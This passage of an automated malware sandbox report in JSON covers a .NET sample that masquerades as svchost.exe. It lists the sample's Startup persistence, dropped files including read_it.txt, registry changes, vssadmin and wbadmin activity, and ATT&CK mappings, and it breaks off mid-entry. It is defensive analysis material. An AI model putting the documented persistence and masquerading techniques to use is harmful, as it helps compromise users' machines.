\"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSFORPARSING\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\svchost.exe\"\n \"svchost.exe\" writes file \"%appdata%\\svchost.exe\"\n \"svchost.exe\" writes file \"%appdata%\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk\"\n \"svchost.exe\" writes file \"%localappdata%\\programs\\python\\python38-32\\lib\\site-packages\\pkg_resources\\tests\\data\\my-test-package-source\\read_it.txt\"\n \"svchost.exe\" writes file \"%appdata%\\microsoft\\windows\\start menu\\programs\\startup\\svchost.url\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"svchost.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\svchost.exe]- [targetUID: 00000000-00005968]\n \"Internet Explorer.lnk\" has type \"ASCII text with no line terminators\"- Location: [%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk]- [targetUID: 00000000-00005968]\n \"read_it.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [%LOCALAPPDATA%\\Programs\\Python\\Python38-32\\Lib\\site-packages\\pkg_resources\\tests\\data\\my-test-package-source\\read_it.txt]- [targetUID: 00000000-00005968]\n \"svchost.url\" has type \"MS Windows 95 Internet shortcut text ASCII text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.url]- [targetUID: 00000000-00005968]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"WMIC.exe\" called \"LoadResource with parameter {'hModule': '1708916736', 'hResInfo': '1709790888'}\" (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '4063233', 'hResInfo': '4063888'}\" (UID: 00000000-00003480)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"svchost.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"WMIC.exe\" called \"FindResourceW\" with parameter \"1\" - (UID: 00000000-00003480)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300b8282c000f00010e5255000e63006f006e00660069006700750072006100740069006f006e00000055004200570053005c0041000b00000b28550000b8282c0088bb2b006f00630061006c005c00500072006f0067007200 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebf8765073310000f0fd7f9a5c987700a0fd7fb0c3230444f0fd7f00000000400000003f0000002300000000f0fd7fa4c32304c15c987760829f772300000000f0fd7f9a5c987700a0fd7fc8c323045789977780839f771317b275d8ebf876 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005776)\n \"svchost.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000030b83200e8f76600145c9777435c9777b4f8660001000000940130000100000068f76600935c987740839f77d4a0977712abf677b4f86600010000000100000000ec32000000000038f7660068f76600d4f7660095e1937782580700feffffffd4a097771bbeb1750000d07500000000 (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetVersionExA\" (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebf8769097390000f0fd7f9a5c987700a0fd7f58c1190444f0fd7f00000000400000003f0000002a00000000f0fd7f4cc11904c15c987760829f772a00000000f0fd7f9a5c987700a0fd7f70c119045789977780839f771317b275d8ebf876 (UID: 00000000-00005968)\n \"WMIC.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003480)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" queries volume information of \"C:\\f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" at 00000000-00005776-0000010C-2806263\n \"svchost.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe\" at 00000000-00005968-0000010C-2964866", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005776)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005776)\n \"svchost.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005968)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SVCHOST.EXE\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SVCHOST.EXE\")\n \"svchost.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"svchost.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"svchost.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"WMIC.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"vssadmin.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004144)\n \"wbadmin.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003720)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000074012900000000000600000000000000500129001a000000982a2d00000000001a000000000000001400000000000000000000000000000000000000000000000200000288bb2b00630400670000000000000000000000008000000000000000aa26008c80032d000100000000000000020000000c000000b8af2c00b8af2c00b3af2c0000000000000000000000290000000001e4f115000000000004f8150095e193775e2a0700feffffff435c97775059977794000000a0000000b2af2c00b0af2c009400000088f31500fdfe55771800000047b3f4e6c3863769b8041500 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600b024fde244d823046d8232770413320004010000 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000300032003300640031003700660033003800350038003600310032006400350066006100390032003200610065006200320037006200330066003100350031006500610035006500620063006600380033003000340035006600610035003200620032002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b977786fab373d8ebf876ac0129000000290000000000000000001d006a017e070000000000000000000000000000000000001e0065017e0700000000000000000000086d290000000000200000000000000000000000 (UID: 00000000-00005776)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"IsWow64Process\" with parameter \"5776\" - (UID: 00000000-00005776)\n \"svchost.exe\" called \"IsWow64Process\" with parameter \"5968\" - (UID: 00000000-00005968)\n \"svchost.exe\" called \"IsWow64Process\" (UID: 00000000-00005968)\n \"vssadmin.exe\" called \"IsWow64Process\" with parameter \"4144\" - (UID: 00000000-00004144)\n \"WMIC.exe\" called \"IsWow64Process\" with parameter \"3480\" - (UID: 00000000-00003480)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"svchost.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00005776)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"svchost.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WMIC.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" (UID: 00000000-00005968)\n \"WMIC.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"vssadmin.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004144)\n \"WMIC.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003480)\n \"wbadmin.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003720)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-150", "relevance": 1, "name": "Dotnet code contains ability to generate random numbers", "description": "Observed namespace \"System.Security.Cryptography.RNGCryptoServiceProvider\" and TypeReference \".ctor\" in \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\"\n Observed namespace \"System.Security.Cryptography.RandomNumberGenerator\" and TypeReference \"GetBytes\" in \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\"\n Observed namespace \"System.Security.Cryptography.RNGCryptoServiceProvider\" and TypeReference \".ctor\" in \"svchost.exe\"\n Observed namespace \"System.Security.Cryptography.RandomNumberGenerator\" and TypeReference \"GetBytes\" in \"svchost.exe\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called an API \"AdjustTokenPrivileges\"on file: C:\\Windows\\System32\\en-US\\KernelBase.dll.mui\" (UID: 00000000-00005776), \"svchost.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00005968), \"vssadmin.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00004144), \"WMIC.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00003480)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" opened \"\\Device\\KsecDD\"\n \"svchost.exe\" opened \"\\Device\\KsecDD\"\n \"vssadmin.exe\" opened \"\\Device\\KsecDD\"\n \"WMIC.exe\" opened \"\\Device\\KsecDD\"\n \"wbadmin.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"svchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"svchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"svchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"svchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"WMIC.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"WMIC.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"AddClipboardFormatListener\" (Source: f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2, API is part of module: USER32.DLL)\n Found string \"SetParent\" (Source: f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2, API is part of module: USER32.DLL)\n Found string \"Sleep\" (Source: f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2, API is part of module: KERNELBASE.DLL)\n Found string \"GetCurrentProcess\" (Source: f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2, API is part of module: 